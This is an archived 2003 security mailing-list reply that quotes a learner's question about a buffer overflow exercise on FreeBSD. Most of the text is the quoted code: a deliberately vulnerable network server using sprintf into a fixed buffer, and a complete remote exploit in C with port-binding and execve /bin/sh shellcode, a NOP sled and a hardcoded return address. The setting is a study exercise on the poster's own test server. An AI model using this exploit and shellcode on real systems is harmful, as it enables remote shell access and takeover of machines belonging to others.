Re: sample buffer overflow exploit problem
From: deepcode . (pondermate_at_hotmail.com)
Date: 09/28/03
- Previous message: Ganbold: "Re: sample buffer overflow exploit problem"
- Maybe in reply to: Ganbold: "sample buffer overflow exploit problem"
- Next in thread: Ganbold: "Re: sample buffer overflow exploit problem"
- Reply: Ganbold: "Re: sample buffer overflow exploit problem"
- Reply: Ganbold: "Re: sample buffer overflow exploit problem"
- Reply: Ganbold: "Re: sample buffer overflow exploit problem"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: ganbold@micom.mng.net, vuln-dev@securityfocus.com Date: Sat, 27 Sep 2003 23:37:35 -0300
You say that you can connect after the exploit, but then the connection gets
dropped immediately afterwards... is there a firewall in place?
>From: Ganbold <ganbold@micom.mng.net>
>To: vuln-dev@securityfocus.com
>Subject: sample buffer overflow exploit problem
>Date: Sat, 27 Sep 2003 16:54:59 +0900
>
>Hi,
>
>I'm very new to buffer overflow exploit technics and my boss wants me to
>thoroughly understand
>how it works. I'm trying to exploit sample network server in FreeBSD 5.1
>for this purpose.
>When I try to exploit using execve /bin/sh (shellcode1), it works and
>launches the shell in the remote machine.
>However when I try to use port binding shell code, it binds shell to the
>port, but when I try to connect to
>it, it just closes the connection. Also I can't connect to bind port after
>sending buffer using following code snippets:
>..............
> printf("[-] Connecting to bindshell...\n");
> remote.sin_family = AF_INET;
> remote.sin_addr = *((struct in_addr *)host->h_addr);
> remote.sin_port = htons(12345);
> if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
> {
> close(s);
> fprintf(stderr, "Error: connect\n");
> return -1;
> }
> exec_sh(s);
>...............
>
>I appreciate if somebody give me some help to solve this test problem.
>Is there anywhere I can find detailed explanation about buffer overflows
>and working sample network exploits?
>Is there anyway I can generate shellcodes in FreeBSD?
>
>I attached my sample server code and exploit code.
>
>thanks in advance,
>
>Ganbold Ts,
>
>senior programmer,
>Micom Co., Ltd
>Ulaanbaatar,
>Mongolia
>
>
>
>Following is network server code:
>--------------------------------------------------------------------------------------------------------------------------------
>#include <stdio.h>
>#include <netinet/in.h>
>#include <netdb.h>
>#include <sys/socket.h>
>#include <sys/types.h>
>#include <errno.h>
>
>#define BUFFER_SIZE 1024
>#define NAME_SIZE 2048
>
>int handle(int c)
>{
> char buffer[BUFFER_SIZE], name[NAME_SIZE];
> int bytes;
> strcpy(buffer, "Your name?: ");
> bytes = send(c, buffer, strlen(buffer), 0);
> if (bytes == -1)
> return -1;
> bytes = recv(c, name, sizeof(name), 0);
> if (bytes == -1)
> return -1;
> name[bytes - 1] = '\0';
> sprintf(buffer, "Hello %s, nice to meet you!\r\n", name);
> bytes = send(c, buffer, strlen(buffer), 0);
> if (bytes == -1)
> return -1;
> return 0;
>}
>
>
>int main(int argc, char *argv[])
>{
> int s, c, cli_size;
> struct sockaddr_in srv, cli;
> if (argc != 2)
> {
> fprintf(stderr, "usage: %s port\n", argv[0]);
> return 1;
> }
> s = socket(AF_INET, SOCK_STREAM, 0);
> if (s == -1)
> {
> perror("socket() failed");
> return 2;
> }
> srv.sin_addr.s_addr = INADDR_ANY;
> srv.sin_port = htons( (unsigned short int) atol(argv[1]));
> srv.sin_family = AF_INET;
> if (bind(s, &srv, sizeof(srv)) == -1)
> {
> perror("bind() failed");
> return 3;
> }
> if (listen(s, 3) == -1)
> {
> perror("listen() failed");
> return 4;
> }
> for(;;)
> {
> c = accept(s, &cli, &cli_size);
> if (c == -1)
> {
> perror("accept() failed");
> return 5;
> }
> fprintf(stderr,"client from %s\n", inet_ntoa(cli.sin_addr));
> if (handle(c) == -1)
> fprintf(stderr, "%s: handle() failed", argv[0]);
> close(c);
> }
> return 0;
>}
>--------------------------------------------------------------------------------------------------------------------------------
>
>Following is the sample exploit code:
>--------------------------------------------------------------------------------------------------------------------------------
>#include <stdio.h>
>#include <netinet/in.h>
>#include <netdb.h>
>#include <sys/socket.h>
>#include <sys/types.h>
>#include <errno.h>
>#include <unistd.h>
>
>/*
> * FreeBSD shellcode - binds /bin/sh to a port 12345
> *
> * Claes M. Nyberg 20020619
> *
> * <cmn@darklab.org>, <md0claes@mdstud.chalmers.se>
> */
>char shellcode[] = /* port _______*/
> "\x6a\x10\x89\xe1\x83\xec\x10\x89\xe3\x31\xc0\x50\x50\x50\x66\x68\x30\x39"
> "\xb4\x20\x66\x50\x89\xe2\x6a\x06\x6a\x01\x6a\x02\x50\x30\xe4\xb0\x61\xcd"
> "\x80\x89\xc7\x6a\x10\x52\x50\x50\xb0\x68\xcd\x80\x31\xc0\x50\x57\x50\x83"
> "\xc0\x6a\xcd\x80\x51\x53\x57\x50\xb0\x1e\xcd\x80\x89\xc3\x31\xc0\x50\x53"
> "\x50\xb0\x5a\xcd\x80\xb0\x01\x50\x53\x50\x83\xc0\x59\xcd\x80\xb0\x02\x50"
> "\x53\x50\x83\xc0\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
> "\x69\x6e\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\x50\xb0\x3b\xcd\x80\x31\xc0"
> "\x40\x50\x50\xcd\x80";
>
>/*
> * FreeBSD shellcode - execve /bin/sh
> *
> * Claes M. Nyberg 20020120
> *
> * <cmn@darklab.org>, <md0claes@mdstud.chalmers.se>
> */
>char shellcode1[] =
> "\x31\xc0" /* xorl %eax, %eax */
> "\x50" /* pushl %eax */
> "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
> "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
> "\x89\xe3" /* movl %esp, %ebx */
> "\x50" /* pushl %eax */
> "\x53" /* pushl %ebx */
> "\x89\xe2" /* movl %esp, %edx */
> "\x50" /* pushl %eax */
> "\x52" /* pushl %edx */
> "\x53" /* pushl %ebx */
> "\x50" /* pushl %eax */
> "\xb0\x3b" /* movb $0x3b, %al */
> "\xcd\x80" /* int $0x80 */
> "\x31\xc0" /* xorl %eax, %eax */
> "\x40" /* inc %eax */
> "\x50" /* pushl %eax */
> "\x50" /* pushl %eax */
> "\xcd\x80"; /* int $0x80 */
>
>#define RET 0xbfbffa48
>
>int exec_sh(int sockfd)
>{
> char snd[4096],rcv[4096];
> fd_set rset;
> while(1)
> {
> FD_ZERO(&rset);
> FD_SET(fileno(stdin),&rset);
> FD_SET(sockfd,&rset);
> select(255,&rset,NULL,NULL,NULL);
> if(FD_ISSET(fileno(stdin),&rset))
> {
> memset(snd,0,sizeof(snd));
> fgets(snd,sizeof(snd),stdin);
> write(sockfd,snd,strlen(snd));
> }
> if(FD_ISSET(sockfd,&rset))
> {
> memset(rcv,0,sizeof(rcv));
> if(read(sockfd,rcv,sizeof(rcv))<=0)
> exit(0);
> fputs(rcv,stdout);
> }
> }
>}
>
>int main(int argc, char *argv[]) {
>
> char buffer[1064];
> int s,t, i, size;
> struct sockaddr_in remote;
> struct hostent *host;
>
> if(argc != 3) {
> printf("Usage: %s target-ip port\n", argv[0]);
> return -1;
> }
>
> // filling buffer with NOPs
> memset(buffer, 0x90, 1064);
>
> //copying shellcode into buffer
> memcpy(buffer+1001-sizeof(shellcode) , shellcode, sizeof(shellcode));
>
> // the previous statement causes a unintential Nullbyte at buffer[1000]
> buffer[1000] = 0x90;
>
> // Copying the return address multiple times at the end of the buffer...
> for(i=1022; i < 1059; i+=4) {
> * ((int *) &buffer[i]) = RET;
> }
>
> buffer[1063] = 0x0;
>
> //getting hostname
>
> host=gethostbyname(argv[1]);
> if (host==NULL)
> {
> fprintf(stderr, "Unknown Host %s\n",argv[1]);
> return -1;
> }
>
> // creating socket...
> s = socket(AF_INET, SOCK_STREAM, 0);
> if (s < 0)
> {
> fprintf(stderr, "Error: Socket\n");
> return -1;
> }
> remote.sin_family = AF_INET;
> remote.sin_addr = *((struct in_addr *)host->h_addr);
> remote.sin_port = htons(atoi(argv[2]));
> // connecting with destination host
> if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
> {
> close(s);
> fprintf(stderr, "Error: connect\n");
> return -1;
> }
> //sending exploit string
> size = send(s, buffer, sizeof(buffer), 0);
> if (size==-1)
> {
> close(s);
> fprintf(stderr, "sending data failed\n");
> return -1;
> }
>/*
> printf("[-] Connecting to bindshell...\n");
> remote.sin_family = AF_INET;
> remote.sin_addr = *((struct in_addr *)host->h_addr);
> remote.sin_port = htons(12345);
> if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
> {
> close(s);
> fprintf(stderr, "Error: connect\n");
> return -1;
> }
> exec_sh(s);
>*/
> // closing socket
> close(s);
>}
>
>--------------------------------------------------------------------------------------------------------------------------------
>
>
>
_________________________________________________________________
STOP MORE SPAM with the new MSN 8 and get 2 months FREE*
http://join.msn.com/?page=features/junkmail
- Previous message: Ganbold: "Re: sample buffer overflow exploit problem"
- Maybe in reply to: Ganbold: "sample buffer overflow exploit problem"
- Next in thread: Ganbold: "Re: sample buffer overflow exploit problem"
- Reply: Ganbold: "Re: sample buffer overflow exploit problem"
- Reply: Ganbold: "Re: sample buffer overflow exploit problem"
- Reply: Ganbold: "Re: sample buffer overflow exploit problem"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
